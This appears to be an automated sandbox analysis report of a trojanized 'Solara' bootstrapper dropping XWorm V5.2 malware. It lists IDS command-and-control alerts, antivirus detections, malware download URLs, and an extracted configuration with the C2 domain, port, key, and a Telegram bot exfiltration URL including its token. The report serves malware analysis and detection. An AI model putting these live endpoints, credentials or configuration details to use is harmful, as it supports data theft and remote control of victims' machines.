                      2024-10-13T19:12:36.194727+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.217021+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.343022+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.355244+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.522191+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.522288+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.666956+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.667007+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.790960+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.838304+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.974323+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.978009+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:37.353794+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:37.358012+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:37.520875+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:37.526507+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:37.669851+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:37.679665+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:37.811597+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:37.885657+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.010070+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:38.013906+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.137365+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:38.147705+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.302499+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:38.326238+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.514720+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:38.668937+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.994227+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.003587+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.110804+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.118359+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.247152+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.261605+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.498134+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.514561+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.779265+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.830215+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.914996+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.954359+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.114304+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.123679+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.267196+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.369733+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.428767+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.505626+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.548144+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.625569+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.658480+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.735823+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.779847+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.843779+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.891638+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.969974+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.011378+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.086011+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.193739+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.246736+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.504014+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.619885+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.659876+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.737664+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.783425+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.859701+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.901237+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.979990+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.025388+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.104103+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.141747+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.235072+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.277834+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.349101+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.389947+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.469362+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.508746+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.591859+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.629438+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.717658+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.747902+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.830920+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.868145+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.948579+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.977943+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.073767+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.094013+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.194483+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.230515+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.313694+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.377637+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.433455+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.505123+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.553233+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.640543+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.737831+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.817435+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.883805+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:44.207256+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:44.219137+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:44.414334+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:44.584379+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:10:19.929995+020028559241Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:10:14.834834+020028531911Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:10:14.387119+020028531921Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeAvira: detection malicious, Label: TR/Agent_AGen.ftans
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeAvira: detection malicious, Label: HEUR/AGEN.1305458
                      Source: C:\Users\user\AppData\Roaming\explorer.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Found malware configuration
                      Source: 0000001C.00000002.2815058527.00000000026A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "cash-hispanic.gl.at.ply.gg"], "Port": "1764", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "Utorrent.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031"}
                      Multi AV Scanner detection for domain / URL
                      Source: cash-hispanic.gl.at.ply.ggVirustotal: Detection: 5%Perma Link
                      Source: getsolara.devVirustotal: Detection: 13%Perma Link
                      Source: 79c62fd6.solaraweb-alj.pages.devVirustotal: Detection: 7%Perma Link
                      Source: https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeVirustotal: Detection: 7%Perma Link
                      Source: https://79c62fd6.solaraweb-alj.pages.devVirustotal: Detection: 8%Perma Link
                      Source: http://79c62fd6.solaraweb-alj.pages.devVirustotal: Detection: 7%Perma Link
                      Source: https://getsolara.dev/api/endpoint.jsonChttps://pastebin.com/raw/ZESVzSgKVirustotal: Detection: 10%Perma Link
                      Source: https://getsolara.dev/asset/discord.jsonVirustotal: Detection: 9%Perma Link
                      Source: http://getsolara.devVirustotal: Detection: 13%Perma Link
                      Source: cash-hispanic.gl.at.ply.ggVirustotal: Detection: 5%Perma Link
                      Source: https://getsolara.devVirustotal: Detection: 13%Perma Link
                      Source: https://getsolara.dev/api/endpoint.jsonVirustotal: Detection: 11%Perma Link
                      Source: https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeReversingLabs: Detection: 79%
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\AppData\Roaming\explorer.exeReversingLabs: Detection: 87%
                      Multi AV Scanner detection for submitted file
                      Source: 8svMXMXNRn.exeReversingLabs: Detection: 65%
                      Source: 8svMXMXNRn.exeVirustotal: Detection: 76%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\explorer.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: 8svMXMXNRn.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: 127.0.0.1,cash-hispanic.gl.at.ply.gg
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: 1764
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: <123456789>
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: <Xwormmm>
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: XWorm V5.2
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: Utorrent.exe
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: %AppData%
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: explorer.exe
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: 8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpackString decryptor: 5405936031
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.66.44.59:443 -> 192.168.2.5:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.5:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.5:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 128.116.44.3:443 -> 192.168.2.5:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.5:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49999 version: TLS 1.2
                      Source: 8svMXMXNRn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4870582452.000000001C3E0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: fC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\poros\Downloads\destructive_trojan\destructive_trojan\destructive_trojan\obj\Debug\TrojanXD.pdb source: voosiq.exe, 00000021.00000002.3973742662.00007FF789E06000.00000004.00000001.01000000.00000015.sdmp, TrojanXD.exe, 00000022.00000000.3938755617.000002BF9CD82000.00000002.00000001.01000000.00000016.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4863543107.000000001C333000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: yC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: oC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000048C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb8 source: BootstrapperV21.exe, 00000002.00000002.4851659921.000000001B690000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ~C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: iC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000048C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdb source: BootstrapperV1.22.exe, 00000008.00000002.2553192418.000001ACA6C49000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbmui source: BootstrapperV21.exe, 00000002.00000002.4870582452.000000001C3E0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4851659921.000000001B690000.00000004.00000020.00020000.00000000.sdmp
